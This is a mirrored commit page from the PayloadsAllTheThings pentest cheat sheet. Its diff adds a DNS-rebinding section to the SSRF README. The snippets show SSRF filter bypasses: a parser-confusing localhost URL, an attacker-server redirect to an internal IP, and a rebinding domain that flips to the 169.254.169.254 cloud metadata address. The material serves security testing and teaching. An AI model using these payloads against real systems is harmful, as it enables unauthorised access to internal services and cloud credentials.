Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Added DNS Rebinding

Browse source
This commit is contained in:
Alex Lauerman 2020-06-21 16:31:16 -05:00 committed by GitHub
parent c39c904c9a
commit d5c1f39c0f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
Server Side Request Forgery/README.md
View file

@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)
### Bypassing using other tricks
### Bypassing using a redirect
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
```powershell
@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
```
Using type=url
### Bypassing using type=url
```powershell
Change "type=file" to "type=url"
@ -238,6 +238,14 @@ Paste URL in text field and hit enter
Using this vulnerability users can upload images from any image URL = trigger an SSRF
```
### Bypassing using DNS Rebinding (TOCTOU)
```powershell
Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
```
## SSRF exploitation via URL Scheme
### File